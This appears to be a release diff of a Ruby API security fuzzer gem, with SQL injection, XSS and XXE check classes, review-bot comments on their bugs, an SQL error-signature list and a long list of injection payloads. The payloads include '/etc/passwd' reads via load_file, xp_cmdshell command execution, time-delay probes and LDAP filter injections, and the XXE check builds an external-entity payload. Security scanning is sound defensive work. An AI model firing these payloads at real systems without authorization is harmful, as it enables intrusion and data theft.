API_Fuzzer 0.1.1

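--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,156 @@
+require 'API_Fuzzer/vulnerability'
+require 'API_Fuzzer/error'
+require 'API_Fuzzer/request'
+
+module API_Fuzzer
+class InvalidURLError < StandardError; end
+
+class SqlCheck
+attr_accessor :parameters
+attr_accessor :payloads, :sql_errors
+
+ALLOWED_METHODS = [:get, :post].freeze
+PAYLOAD_PATH = File.expand_path('../../../payloads/sql.txt', __FILE__)
+DETECT_PATH = File.expand_path('../../../payloads/detect/sql.txt', __FILE__)
+
+def self.scan(options = {})
+@payloads = []
+@sql_errors = []
+fetch_payloads
+@url = options[:url] || nil
+raise InvalidURLError, "[ERROR] URL missing in argument" unless @url
+@params = options[:params] || {}
+@cookies = options[:cookies] || {}
+@json = options[:json] || false
+@headers = options[:headers] || {}
+@vulnerabilities = []
+
+fuzz_payloads
+return @vulnerabilities.uniq { |vuln| vuln.description }
+rescue HTTP::ConnectionError => e
+sleep(5)
+fuzz_payloads
+return @vulnerabilities.uniq { |vuln| vuln.description }
+end
+
+def self.fuzz_payloads
+@payloads.each do |payload|
+fuzz_each_payload(payload)
+end
+end
+
+def self.fuzz_each_payload(payload)
+uri = URI(@url)
+path = uri.path
+query = uri.query
+base_uri = query.nil? ? path : [path, query].join("?")
+fragments = base_uri.split(/[\/,?,&]/) - ['']
+fragments.each do |fragment|
+if fragment.match(/\A(\w)+=(\w)*\z/)
+url = @url.gsub(fragment, [fragment, payload].join('')).chomp
+fuzz_each_fragment(url, payload)
+else
+url = @url.gsub(fragment, payload).chomp
+fuzz_each_fragment(url, payload)
+end
+end
+
+return if @params.empty?
+
+@params.keys.each do |parameter|
+fuzz_each_parameter(parameter, payload)
+end
+end
+
+def self.fuzz_each_fragment(url, payload)
+ALLOWED_METHODS.each do |method|
+begin
+response = API_Fuzzer::Request.send_api_request(
+url: url,
+method: method,
+cookies: @cookies,
+headers: @headers
+)
+
+@vulnerabilities << API_Fuzzer::Error.new(description: "#{method} #{@url}", status: response.status, value: response.body) unless success?(response)
+body = ''
+if response_json?(response)
+body = JSON.parse(response.body)
+else
+body = response.body
+end
+
+vulnerable = check_response?(body.to_s.downcase, payload)
+next unless vulnerable
+@vulnerabilities << API_Fuzzer::Vulnerability.new(
+description: "Possible SQL injection in #{method} #{@url}",
+parameter: "URL: #{url}",
+value: "[PAYLOAD] #{payload}",
+type: 'HIGH'
+)
+rescue Exception => e
+puts e.message
+end
+end
+end
+
+def self.fuzz_each_parameter(parameter, payload)
+@params[parameter] = payload
+ALLOWED_METHODS.each do |method|
+begin
+response = API_Fuzzer::Request.send_api_request(
+url: @url,
+params: @params,
+method: method,
+cookies: @cookies,
+headers: @headers
+)
+
+@vulnerabilities << API_Fuzzer::Error.new(description: "[ERROR] #{method} #{@url}", status: response.status, value: response.body) unless success?(response)
+body = response.body.to_s.downcase
+vulnerable = check_response?(body, payload)
+next unless vulnerable
+
+@vulnerabilities << API_Fuzzer::Vulnerability.new(
+description: "Possible SQL injection in #{method} #{@url} parameter: #{parameter}",
+parameter: "parameter: #{@parameter}",
+value: "[PAYLOAD] #{payload}",
+type: 'HIGH'
+)
+rescue Exception => e
+puts e.message
+end
+end
+end
+
+def self.check_response?(body, payload)
+@sql_errors.each do |error|
+if body.match(error.chomp)
+puts error
+return true
+end
+end
+false
+end
+
+def self.success?(response)
+response.code == 200
+end
+
+def self.response_json?(response)
+response && response.headers['Content-Type'] && response.headers['Content-Type'].downcase =~ /application\/json/
+end
+
+def self.fetch_payloads
+file = File.expand_path(PAYLOAD_PATH, __FILE__)
+File.readlines(file).each do |line|
+@payloads << line
+end
+
+file = File.expand_path(DETECT_PATH, __FILE__)
+File.readlines(file).each do |line|
+@sql_errors << line.downcase
+end
+end
+end
+end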
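Review bot: `rescue Exception => e` followed by `puts e.message` in fuzz_each_fragment and fuzz_each_parameter swallows Interrupt and SystemExit, and it also absorbs HTTP::ConnectionError before the retry rescue in scan can see it, so that retry path is effectively unreachable; narrow both to `rescue StandardError => e`. In fuzz_each_parameter the finding's `parameter: "parameter: #{@parameter}"` reads an instance variable that nothing in this file assigns, so every finding reports an empty name; the `parameter` argument was meant. Both lists are loaded with `File.readlines(file)` without `chomp: true`, so each payload and each detection string carries a trailing newline into the fuzzed URL and parameter values (check_response? only chomps the detection side); `File.readlines(file, chomp: true)` fixes both. `@params[parameter] = payload` also writes into the caller's hash and is never restored, so later parameters are fuzzed with earlier payloads still in place.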
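--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,3 @@
+module APIFuzzer
+VERSION = "0.1.1".freeze
+end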
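Review bot: The version constant is defined under `module APIFuzzer` while every other file in this release uses `module API_Fuzzer`, so `API_Fuzzer::VERSION` is undefined and anything referencing the version (the gemspec is not shown) has to use the odd-one-out name; `module API_Fuzzer` keeps the namespace consistent.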
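--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,14 @@
+module API_Fuzzer
+
+class Vulnerability
+attr_accessor :description, :value, :type, :parameter
+
+def initialize(options = {})
+@description = options[:description]
+@parameter = options[:parameter]
+@value = options[:value]
+@type = options[:type]
+end
+end
+
+end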
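Review bot: `initialize(options = {})` takes an untyped options hash and silently leaves every attribute nil on a misspelled key; keyword arguments `def initialize(description: nil, parameter: nil, value: nil, type: nil)` make the contract explicit and surface mistakes at the call site. The accepted values of `type` ('HIGH' and 'MEDIUM' in the callers shown) are undocumented; a YARD line such as `# @param type [String] severity label, e.g. 'HIGH' or 'MEDIUM'` above initialize would help. None of the callers in this release use the writers, so `attr_reader` would likely suffice, though callers outside the page may differ.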
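--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,92 @@
+require 'API_Fuzzer/vulnerability'
+require 'API_Fuzzer/error'
+require 'API_Fuzzer/request'
+
+module API_Fuzzer
+
+class InvalidURLError < StandardError; end
+
+class XssCheck
+attr_accessor :parameters
+
+ALLOWED_METHODS = [:get, :post].freeze
+PAYLOADS = []
+PAYLOAD_PATH = File.expand_path('../../../payloads/xss.txt', __FILE__)
+
+def self.scan(options = {})
+@url = options[:url] || nil
+raise InvalidURLError, "[ERROR] URL missing in argument" unless @url
+@params = options[:params] || {}
+@cookies = options[:cookies] || {}
+@headers = options[:headers] || {}
+@json = options[:json] || false
+@vulnerabilities = []
+
+fetch_payloads
+PAYLOADS.each do |payload|
+fuzz_each_payload(payload)
+end
+@vulnerabilities.uniq { |vuln| vuln.description }
+end
+
+private
+
+def self.fuzz_each_payload(payload)
+@params.keys.each do |parameter|
+fuzz_each_parameter(parameter, payload)
+end
+end
+
+def self.fuzz_each_parameter(parameter, payload)
+@params[parameter] = payload
+
+ALLOWED_METHODS.each do |method|
+response = API_Fuzzer::Request.send_api_request(
+url: @url,
+params: @params,
+method: method,
+cookies: @cookies,
+headers: @headers
+)
+
+if response_json?(response)
+body = JSON.parse(response.body)
+else
+vulnerable = check_response?(response.body, payload)
+
+if success?(response)
+@vulnerabilities << API_Fuzzer::Vulnerability.new(
+description: "Possible XSS in #{method} #{@url} parameter: #{@parameter}",
+value: "[PAYLOAD] #{payload}",
+type: 'MEDIUM'
+) if vulnerable
+else
+API_Fuzzer::Error.new(description: "[ERROR] #{method} #{@url}", status: response.status, value: response.body)
+end
+end
+end
+end
+
+def self.check_response?(body, payload)
+if body.to_s.include?(payload)
+return true
+end
+false
+end
+
+def self.success?(response)
+response.code == 200
+end
+
+def self.response_json?(response)
+response && response.headers['Content-Type'].downcase =~ /application\/json/
+end
+
+def self.fetch_payloads
+file = File.expand_path(PAYLOAD_PATH, __FILE__)
+File.readlines(file).each do |line|
+PAYLOADS << line
+end
+end
+end
+end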
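Review bot: `response_json?` calls `response.headers['Content-Type'].downcase` with no nil guard, and unlike SqlCheck nothing in this class rescues, so the first response without a Content-Type header raises NoMethodError and aborts the whole scan; guard it as `response && response.headers['Content-Type'] && response.headers['Content-Type'].downcase =~ /application\/json/`. The JSON branch assigns `body = JSON.parse(response.body)` and then does nothing with it, so JSON responses are never checked, and the non-success branch builds an `API_Fuzzer::Error` that is discarded rather than appended to `@vulnerabilities`. The description interpolates `#{@parameter}`, which is never assigned, where the `parameter` argument was meant. `private` placed before `def self.` methods has no effect on singleton methods; `private_class_method` does. `PAYLOADS` is a module-level constant that `fetch_payloads` appends to on every `scan` call, so repeated scans in one process send each payload multiple times.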
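--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,47 @@
+require 'API_Fuzzer/vulnerability'
+require 'API_Fuzzer/error'
+require 'API_Fuzzer/request'
+
+module API_Fuzzer
+class XxeCheck
+
+def self.scan(options = {})
+@url = options[:url] || nil
+@params = options[:params]
+@scan_hash = options[:scan]
+@cookies = options[:cookies] || {}
+@headers = options[:headers] || {}
+fuzz_xml_params
+end
+
+private
+
+def self.fuzz_xml_params
+return unless @params
+body = params_serialize.gsub(/\>\s*[a-zA-Z0-9]*\s*\<\//, '>&xxe;<')
+payload = <<-XXEPAYLOAD
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [
+<!ELEMENT foo ANY >
+<!ENTITY xxe SYSTEM "http://127.0.0.1:3000/ping/#{@scan_hash}" >]>
+XXEPAYLOAD
+payload << body
+API_Fuzzer::Request.send_api_request(
+url: @url,
+params: payload,
+body: true,
+method: :post,
+headers: @headers,
+cookies: @cookies
+)
+end
+
+def self.params_serialize
+body = []
+@params.keys.each do |key, value|
+body << "#{key}=#{value}"
+end
+body.join('&')
+end
+end
+end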
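Review bot: `@params.keys.each do |key, value|` iterates over the key array, so `value` is always nil and params_serialize produces `key=` for every parameter; `@params.each do |key, value|` is what was meant. The substitution in fuzz_xml_params then searches that `&`-joined form string for `>value</`, a pattern that only occurs in XML, so as written the body appears to be sent unmodified — presumably an XML serialization of the params was intended, which is worth confirming with the author. `private` before `def self.` methods does not make them private; `private_class_method` does. Unlike SqlCheck and XssCheck, `@url = options[:url] || nil` is not validated here, so a missing URL reaches send_api_request as nil instead of raising InvalidURLError.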
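--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,3 @@
+sleep(__TIME__)#
+hi' or sleep(__TIME__)--+
+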
@@ -0,0 +1,89 @@
1
+ &lt;/font&gt;&lt;font face="Arial" size=2&gt;
2
+ A syntax error has occurred
3
+ ADODB.Field error
4
+ ASP.NET is configured to show verbose error messages
5
+ ASP.NET_SessionId
6
+ Active Server Pages error
7
+ An illegal character has been found in the statement
8
+ An unexpected token "END-OF-STATEMENT" was found
9
+ CLI Driver
10
+ Can't connect to local
11
+ Custom Error Message
12
+ DB2 Driver
13
+ DB2 Error
14
+ DB2 ODBC
15
+ Died at
16
+ Disallowed Parent Path
17
+ Error Diagnostic Information
18
+ Error Message : Error loading required libraries.
19
+ Error Report
20
+ Error converting data type varchar to numeric
21
+ Fatal error
22
+ Incorrect syntax near
23
+ Index of
24
+ Internal Server Error
25
+ Invalid Path Character
26
+ Invalid procedure call or argument
27
+ Invision Power Board Database Error
28
+ JDBC Driver
29
+ JDBC Error
30
+ JDBC MySQL
31
+ JDBC Oracle
32
+ JDBC SQL
33
+ Microsoft OLE DB Provider for ODBC Drivers
34
+ Microsoft VBScript compilation error
35
+ Microsoft VBScript error
36
+ MySQL Driver
37
+ MySQL Error
38
+ MySQL ODBC
39
+ ODBC DB2
40
+ ODBC Driver
41
+ ODBC Error
42
+ ODBC Microsoft Access
43
+ ODBC Oracle
44
+ ODBC SQL
45
+ ODBC SQL Server
46
+ OLE/DB provider returned message
47
+ ORA-0
48
+ ORA-1
49
+ Oracle DB2
50
+ Oracle Driver
51
+ Oracle Error
52
+ Oracle ODBC
53
+ PHP Error
54
+ PHP Parse error
55
+ PHP Warning
56
+ Parent Directory
57
+ Permission denied: 'GetObject'
58
+ PostgreSQL query failed: ERROR: parser: parse error
59
+ SQL Server Driver
60
+ SQL Server
61
+ SQL command not properly ended
62
+ SQLException
63
+ Supplied argument is not a valid PostgreSQL result
64
+ Syntax error in query expression
65
+ The error occurred in
66
+ The script whose uid is
67
+ Type mismatch
68
+ Unable to jump to row
69
+ Unclosed quotation mark before the character string
70
+ Unterminated string constant
71
+ Warning: Cannot modify header information - headers already sent
72
+ Warning: Supplied argument is not a valid File-Handle resource in
73
+ Warning: mysql_query()
74
+ Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL
75
+ You have an error in your SQL syntax near
76
+ data source=
77
+ detected an internal error [IBM][CLI Driver][DB2/6000]
78
+ include_path
79
+ invalid query
80
+ is not allowed to access
81
+ mySQL error with query
82
+ mysql error
83
+ on MySQL result index
84
+ server object error
85
+ supplied argument is not a valid MySQL result resource
86
+ unexpected end of SQL command
87
+ MySQL server version
88
+ You have an error in your SQL syntax
89
+ SQL syntax
@@ -0,0 +1,196 @@
1
+ '
2
+ ' --
3
+ (
4
+ )
5
+ *|
6
+ */*
7
+ &
8
+ 0
9
+ 031003000270000
10
+ 0 or 1=1
11
+ 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
12
+ 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
13
+ 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
14
+ 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
15
+ 1 or 1=1
16
+ 1;SELECT%20*
17
+ 1 waitfor delay '0:0:10'--
18
+ '%20or%20''='
19
+ '%20or%201=1
20
+ ')%20or%20('x'='x
21
+ '%20or%20'x'='x
22
+ %20or%20x=x
23
+ %20'sleep%2050'
24
+ %20$(sleep%2050)
25
+ %21
26
+ 23 OR 1=1
27
+ hi' or '1'='1'--
28
+ %26
29
+ %27%20or%201=1
30
+ %28
31
+ %29
32
+ %2A%28%7C%28mail%3D%2A%29%29
33
+ %2A%28%7C%28objectclass%3D%2A%29%29
34
+ %2A%7C
35
+ ||6
36
+ '||'6
37
+ (||6)
38
+ %7C
39
+ a'
40
+ admin' or '
41
+ ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
42
+ ' and 1 in (select var from temp)--
43
+ anything' OR 'x'='x
44
+ "a"" or 1=1--"
45
+ a' or 1=1--
46
+ "a"" or 3=3--"
47
+ a' or 3=3--
48
+ a' or 'a' = 'a
49
+ &apos;%20OR
50
+ as
51
+ asc
52
+ a' waitfor delay '0:0:10'--
53
+ '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
54
+ bfilename
55
+ char%4039%41%2b%40SELECT
56
+ declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
57
+ declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
58
+ declare @q nvarchar (4000) select @q =
59
+ declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
60
+ declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
61
+ declare @s varchar(22) select @s =
62
+ declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
63
+ delete
64
+ desc
65
+ distinct
66
+ '||(elt(-3+5,bin(15),ord(10),hex(char(45))))
67
+ '; exec master..xp_cmdshell
68
+ '; exec master..xp_cmdshell 'ping 172.10.1.255'--
69
+ exec(@s)
70
+ '; exec ('sel' + 'ect us' + 'er')
71
+ exec sp
72
+ '; execute immediate 'sel' || 'ect us' || 'er'
73
+ exec xp
74
+ '; exec xp_regread
75
+ ' group by userid having 1=1--
76
+ handler
77
+ having
78
+ ' having 1=1--
79
+ hi or 1=1 --"
80
+ hi' or 1=1 --
81
+ "hi"") or (""a""=""a"
82
+ hi or a=a
83
+ hi' or 'a'='a
84
+ hi') or ('a'='a
85
+ 'hi' or 'x'='x';
86
+ insert
87
+ like
88
+ limit
89
+ *(|(mail=*))
90
+ *(|(objectclass=*))
91
+ or
92
+ ' or ''='
93
+ or 0=0 #"
94
+ ' or 0=0 --
95
+ ' or 0=0 #
96
+ " or 0=0 --
97
+ or 0=0 --
98
+ or 0=0 #
99
+ ' or 1 --'
100
+ ' or 1/*
101
+ ; or '1'='1'
102
+ ' or '1'='1
103
+ ' or '1'='1'--
104
+ ' or 1=1
105
+ ' or 1=1 /*
106
+ ' or 1=1--
107
+ ' or 1=1--
108
+ '/**/or/**/1/**/=/**/1
109
+ ‘ or 1=1 --
110
+ " or 1=1--
111
+ or 1=1
112
+ or 1=1--
113
+ or 1=1 or ""=
114
+ ' or 1=1 or ''='
115
+ ' or 1 in (select @@version)--
116
+ or%201=1
117
+ or%201=1 --
118
+ ' or 2 > 1
119
+ ' or 2 between 1 and 3
120
+ ' or 3=3
121
+ ‘ or 3=3 --
122
+ ' or '7659'='7659
123
+ or a=a
124
+ or a = a
125
+ ' or 'a'='a
126
+ ' or a=a--
127
+ ') or ('a'='a
128
+ " or "a"="a
129
+ ) or (a=a
130
+ order by
131
+ ' or (EXISTS)
132
+ or isNULL(1/0) /*
133
+ " or isNULL(1/0) /*
134
+ ' or 'something' like 'some%'
135
+ ' or 'something' = 'some'+'thing'
136
+ ' or 'text' = n'text'
137
+ ' or 'text' > 't'
138
+ ' or uid like '%
139
+ ' or uname like '%
140
+ ' or 'unusual' = 'unusual'
141
+ ' or userid like '%
142
+ ' or user like '%
143
+ ' or username like '%
144
+ ' or username like char(37);
145
+ ' or 'whatever' in ('whatever')
146
+ ' -- &password=
147
+ password:*/=1--
148
+ PRINT
149
+ PRINT @@variable
150
+ procedure
151
+ replace
152
+ select
153
+ ' select * from information_schema.tables--
154
+ ' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
155
+ ' (select top 1
156
+ --sp_password
157
+ 'sqlattempt1
158
+ (sqlattempt2)
159
+ 'sqlvuln
160
+ '+sqlvuln
161
+ (sqlvuln)
162
+ sqlvuln;
163
+ t'exec master..xp_cmdshell 'nslookup www.google.com'--
164
+ to_timestamp_tz
165
+ truncate
166
+ tz_offset
167
+ ' UNION ALL SELECT
168
+ ' union all select @@version--
169
+ ' union select
170
+ uni/**/on sel/**/ect
171
+ ' UNION SELECT
172
+ ' union select 1,load_file('/etc/passwd'),1,1,1;
173
+ ) union select * from information_schema.tables;
174
+ ' union select * from users where login = char(114,111,111,116);
175
+ update
176
+ '||UTL_HTTP.REQUEST
177
+ ,@variable
178
+ @variable
179
+ @var select @var as var into temp end --
180
+ \x27UNION SELECT
181
+ x' AND 1=(SELECT COUNT(*) FROM tabname); --
182
+ x' AND email IS NULL; --
183
+ x' AND members.email IS NULL; --
184
+ x' AND userid IS NULL; --
185
+ x' or 1=1 or 'x'='y
186
+ x' OR full_name LIKE '%Bob%
187
+ ý or 1=1 --
188
+ 1'1
189
+ 1 exec sp_ (or exec xp_)
190
+ 1 and 1=1
191
+ 1' and 1=(select count(*) from tablenames); --
192
+ 1 or 1=1
193
+ 1' or '1'='1
194
+ 1or1=1
195
+ 1'or'1'='1
196
+ fake@ema'or'il.nl'='il.nl